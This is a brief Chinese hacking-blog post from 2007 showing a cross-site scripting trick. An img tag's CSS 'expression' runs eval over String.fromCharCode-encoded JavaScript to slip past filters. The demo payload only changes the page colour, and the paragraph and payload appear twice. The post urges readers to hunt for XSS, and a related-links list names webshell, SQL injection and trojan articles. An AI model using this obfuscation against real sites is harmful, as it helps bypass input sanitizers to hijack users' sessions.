expression&eval跨站的一个方法
更新时间:2007年03月08日 00:00:00 作者:
expression这个CSS的属性很多程序都没有过滤好,很容易被跨,不知道用就参考剑心的幻影论坛跨站脚本漏洞测试过程.
我这里要说的是另外一种方法,使用String.fromCharCode方法把ASCⅡ码转换为字符再用EVAL函数执行.
<img src="#" style="Xss:expression(eval(
String.fromCharCode(100,111,99,117,109,101,110,116,46,98,103,67,111,108,111,114,61,34,98,108,117,101,34)));">
嘿嘿,大把的XSS等你去挖掘,ENJOY IT :)
我这里要说的是另外一种方法,使用String.fromCharCode方法把ASCⅡ码转换为字符再用EVAL函数执行.
<img src="#" style="Xss:expression(eval(
String.fromCharCode(100,111,99,117,109,101,110,116,46,98,103,67,111,108,111,114,61,34,98,108,117,101,34)));">
嘿嘿,大把的XSS等你去挖掘,ENJOY IT :)
相关文章
ART OF WEB-SQL-INJECTION第2卷 ORACLE篇
在国外对ORACLE的攻击一直很收关注,只是国内研究的人不太多,或者技术不够~这里我就打响第一炮吧2007-10-10
本文作者:angel文章性质:原创 国内能看到php+Mysql注入的文章可能比较少,但是如果关注各种WEB程序的漏洞,就可以发现,其实这些漏洞的文章其实就是一个例子。2008-05-05
本站只是提供知识,方便大家以后的查杀木马,不是用来搞破坏2008-01-01
开放IPC$共享...2007-01-01
expression&eval跨站的一个方法...2007-03-03
国内外黑客组织网址集锦...2007-06-06
phpMyAdmin 后台拿webshell...2007-03-03
QQ密码保护是一套保障QQ密码安全的机制。通过给你的QQ号填写对应的相关资料,如证件号、安全提示问题、安全邮箱等,给你的QQ号穿一件防弹衣。一旦出现问题,就可以通过QQ密码保护找回QQ密码2012-09-09
新编MS07004网页木马源码代码...2007-03-03
删除xp_cmdshell和xplog70.dll不用担心,只要保留xp_regwrite就可以执行系统命令,拥有一个dos shell 利用RDS的一个老问题,在IIS 4.0的时候被广泛利用,现在好像没多少人想得起来了 主要是由于Jet允许调用VBA的shell()函数,该函数允许你执行shell命令2008-05-05
最新评论